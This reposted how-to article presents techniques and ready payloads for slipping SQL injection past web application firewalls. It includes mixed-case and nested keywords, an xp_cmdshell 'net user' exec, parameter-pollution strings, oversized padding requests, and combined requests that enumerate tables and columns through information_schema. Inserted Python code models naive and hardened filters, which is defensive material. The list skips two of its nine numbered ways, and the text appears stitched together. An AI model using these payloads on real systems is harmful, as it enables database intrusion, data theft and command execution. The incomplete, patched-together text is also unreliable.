2025-03-28 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article explains in detail nine ways of bypassing a Web application firewall during SQL injection testing. The content is offered as a reference; the aim is that readers understand the relevant techniques after reading it.
The main function of a Web Application Firewall (WAF) is to filter, monitor and block HTTP traffic flowing into and out of a Web application. A WAF differs from a regular firewall in that it inspects the content of requests to a specific Web application, whereas a regular firewall acts as a gate between networks and servers. By inspecting HTTP traffic it can stop attacks that target vulnerabilities in the Web application itself, such as SQL injection, XSS, file inclusion, and security misconfiguration.
How does WAF work?
Protocol anomaly detection: reject requests that do not conform to the HTTP standard
Enhanced input validation: proxy and server-side validation, not just client-side validation
Whitelist and blacklist
Rule-based and anomaly-based protection: a rule-based blacklist depends on the quality and completeness of its signatures, while anomaly-based protection is more flexible
State management: focuses on session protection, including Cookie protection, anti-evasion techniques, response monitoring and information-disclosure protection
How do I bypass WAF?
1. When testing SQL injection against the target URL, change the case of the letters in the injection statement. If the WAF uses a case-sensitive blacklist, the mixed-case payload no longer matches its signatures, while the database, which treats SQL keywords case-insensitively, still executes it.
http://target.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4
2. Keyword substitution: if the WAF deletes a matched keyword or token instead of rejecting the request, the token it removes can be placed in the middle of another copy of the keyword, so that after the deletion the original keyword is reassembled and forwarded to the application (for example, SELECT can be written with the filtered token inserted between SEL and ECT).
5. Equivalent functions and commands: when a particular function or variable is blacklisted, replace it with one that yields the same result:
ascii() in place of other character-conversion functions
sleep() => benchmark()
concat_ws() => group_concat()
mid(), substr() => substring()
@@user => user()
@@datadir => datadir()
A blind-injection comparison such as substr((select 'password'),1,1)=0x70 can be rewritten with strcmp(), which also tells you on which side of the guess the true character lies:
strcmp(left('password',1),0x69)=1
strcmp(left('password',1),0x70)=0
strcmp(left('password',1),0x71)=-1
6. Use special symbols
Here all non-alphanumeric characters are grouped under the heading of special symbols; each has its own meaning and usage in SQL and can replace whitespace or break up a keyword that a signature expects to see whole.
` (backtick): select `version()`;
- (minus): select+id-1+1.from users; (the dot after a numeric literal means no space is needed before FROM)
@: select@^1.from users;
MySQL function() as xxx
Other usable symbols: ` ~ ! @ % ( ) [ ] . - + |
Example
'se'+'lec'+'t'
%S%E%L%E%C%T 1
1.aspx?id= exec('ma'+'ster..x'+'p_cm'+'dsh'+'ell "net user"')
'or-+2
id=1+(UnI)(oN)+(SeL)(EcT)
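To make ways 1 and 2 concrete, here is an added Python example (not code from the original article) that models two common blacklist-WAF mistakes next to a hardened check. The keyword list, the function names and the payloads other than the article's own uNIoN sELecT request are assumptions made for the illustration. The naive checker is case-sensitive (way 1); the naive sanitizer strips keywords and forwards the result, so a keyword nested inside a second copy of itself survives (way 2); the hardened check normalizes first (repeated URL-decoding, case folding, comment handling that keeps the body of MySQL /*! ... */ inline comments because the server executes it) and then rejects instead of rewriting.

```python
import re
from urllib.parse import unquote_plus

# Constructed keyword blacklist for a toy WAF (assumption, not taken from the article).
BLACKLIST = ("union", "select", "sleep", "benchmark")
KEYWORD_RE = re.compile(r"\b(" + "|".join(BLACKLIST) + r")\b")


def naive_is_blocked(raw: str) -> bool:
    """Case-sensitive substring blacklist: a mixed-case keyword slips past it (way 1)."""
    return any(kw in raw for kw in BLACKLIST)


def naive_sanitize(raw: str) -> str:
    """Strip-and-forward filter: every blacklisted keyword is deleted and the
    result goes on to the application. Deleting a keyword that sits inside a
    second copy of itself leaves the keyword behind (way 2)."""
    out = raw
    for kw in BLACKLIST:
        out = out.replace(kw, "")
    return out


def normalize(raw: str) -> str:
    """Canonical form for matching: URL-decode until stable (catches double
    encoding), fold case, keep the body of MySQL /*! ... */ inline comments
    because the server executes it, replace ordinary comments with a space
    because the SQL parser treats them as token separators, collapse whitespace."""
    decoded = raw
    for _ in range(3):  # bounded loop: %2525 -> %25 -> %
        nxt = unquote_plus(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    s = decoded.lower()
    s = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", s, flags=re.S)
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)
    return re.sub(r"\s+", " ", s).strip()


def hardened_is_blocked(raw: str) -> bool:
    """Reject, never rewrite: a whole-word match on the normalized text blocks the request."""
    return KEYWORD_RE.search(normalize(raw)) is not None


if __name__ == "__main__":
    for payload in ("-15 uNIoN sELecT 1,2,3,4",          # the article's way-1 request
                    "-15 uniunionon selselectect 1,2",   # constructed way-2 payload
                    "1+/*!uNIOn*/+/*!SeLECT*/+1"):       # constructed inline-comment payload
        print(payload, "naive:", naive_is_blocked(payload), "hardened:", hardened_is_blocked(payload))
```

Note that the hardened check deliberately lets the double-written payload through untouched: "uniunionon" only becomes UNION after a stripping pass, and sent as-is it is just a syntax error at the database. If a filter must rewrite input, it has to re-scan the rewritten result, and none of this replaces parameterized queries in the application itself.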
7. HTTP parameter control
Confuse the WAF by supplying several parameters with the same name. In some setups (for example Apache with PHP) the application uses only the last id= value while the WAF inspects only the first, so the request looks legitimate to the WAF and the application still receives the malicious input. Most WAFs today handle HTTP parameter pollution (HPP), but it is still worth a try.
+ HPP (HTTP Parameter Pollution)
/?id=1;select+1,2,3+from+users+where+id=1--
/?id=1;select+1&id=2,3+from+users+where+id=1--
/?id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users
HPP is also called duplicate parameter pollution; the simplest case is uid=1&uid=2&uid=3. Web servers handle such duplicates differently: some keep only the first occurrence, some only the last, and some concatenate all occurrences, and the bypass works whenever the WAF's interpretation differs from the application's.
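The following Python example is added here to show the HPP mechanics described above; it is not code from the original article. It re-parses the article's second and third HPP query strings under three duplicate-parameter behaviours (first occurrence wins, last occurrence wins, and comma-joined concatenation), models a WAF that matches each value on its own, and shows what the database parser ends up seeing once comments are treated as separators. The SELECT ... FROM signature, the function names and the mapping of behaviours to server families are simplifying assumptions.

```python
import re
from urllib.parse import unquote_plus

# Toy WAF signature: a SELECT ... FROM somewhere in a value (assumption).
SQLI_RE = re.compile(r"\bselect\b.*\bfrom\b", re.I | re.S)


def params(query: str):
    """Split a raw query string into (name, value) pairs, keeping every duplicate.
    Done by hand so the splitting rule ('&' only) is explicit."""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs


def first_value(query: str, name: str):
    """First occurrence wins (typical of servlet containers; assumption for the demo)."""
    for k, v in params(query):
        if k == name:
            return v
    return None


def last_value(query: str, name: str):
    """Last occurrence wins (PHP-style overwrite)."""
    val = None
    for k, v in params(query):
        if k == name:
            val = v
    return val


def joined_value(query: str, name: str):
    """All occurrences concatenated with a comma (ASP/ASP.NET-style)."""
    vals = [v for k, v in params(query) if k == name]
    return ",".join(vals) if vals else None


def effective_sql(value: str) -> str:
    """Approximate what the SQL parser sees: comments act as token separators."""
    stripped = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", stripped).strip()


def per_value_waf_blocks(query: str, name: str = "id") -> bool:
    """Toy WAF that matches each occurrence on its own: the weakness HPP abuses."""
    return any(SQLI_RE.search(v) for k, v in params(query) if k == name)


def hardened_waf_blocks(query: str, name: str = "id") -> bool:
    """Match on the comma-joined form after comment stripping: it contains every
    single occurrence as a substring, so it covers first-wins, last-wins and
    joined backends alike without rejecting benign repeated parameters."""
    joined = joined_value(query, name)
    return joined is not None and SQLI_RE.search(effective_sql(joined)) is not None


if __name__ == "__main__":
    # The article's own HPP examples, as query strings (constructed sample input).
    for q in ("id=1;select+1&id=2,3+from+users+where+id=1--",
              "id=1/**/union/*&id=*/select/*&id=*/pwd/*&id=*/from/*&id=*/users"):
        print("first :", first_value(q, "id"))
        print("last  :", last_value(q, "id"))
        print("joined:", effective_sql(joined_value(q, "id")))
        print("per-value WAF blocks:", per_value_waf_blocks(q),
              "| hardened blocks:", hardened_waf_blocks(q))
```

The third article example only becomes a query on a backend that joins duplicates: the comma inserted between occurrences lands inside a /* ... */ comment each time, so the concatenated value reads as 1 union select pwd from users once comments are discarded.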
+ HPF (HTTP Parameter Fragment)
This is HTTP split injection: the payload is fragmented across several parameters so that no single one looks malicious. It is comparable to CRLF injection, which uses control characters such as %0a and %0d to insert line breaks.
+ HPC (HTTP Parameter Contamination)
RFC 2396 defines the following character classes:
Unreserved: a-z, A-Z, 0-9 and - _ . ! ~ * ' ( )
Reserved: ; / ? : @ & = + $ ,
Unwise: { } | \ ^ [ ] `
Different Web servers have different logic when processing specially constructed requests:
Take the magic character % as an example: ASP and ASP.NET are affected, as the %S%E%L%E%C%T example above shows.
8. Buffer overflow
A WAF, like any other application, has its own flaws and vulnerabilities. If a buffer overflow occurs the WAF may crash, and even when the overflow does not lead to code execution it can leave the WAF unable to inspect requests properly, so its protection collapses. Many WAFs also inspect only the first part of a request (an inspection size limit) and pass the remainder through unexamined, which is often the real reason an oversized request gets through.
?id=1 and (select 1)=(Select 0xA*1000)+UnIoN+SeLeCT+1,2,version(),4,user(),8,9,10,11,13,14,15,17,18,19,19,20,22,23,24,25,26...
Here 0xA*1000 stands for the hex literal padded out to roughly 1000 characters; the comparison is always false and serves only to inflate the request in front of the UNION SELECT.
9. Integration bypass
When a single technique is not enough, combine several of them. The two requests below stack the oversized-request trick, mixed case, MySQL /*! ... */ inline comments, ordinary comments as separators and hex-encoded strings: the first enumerates the table names of the current database from information_schema, the second the columns of the table Admin (0x41646d696e is "Admin" in hex, so the name never appears as a quoted string).
target.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECT*/+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()--
target.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECT*/+1,2,COLUMN_NAME,3,4,5+FrOM /*information_schema*/.COLUMNS /*!WHERE */+TABLE_NAME=0x41646d696e--
Those are the nine ways of bypassing a Web application firewall during SQL injection; I hope the above is of some help.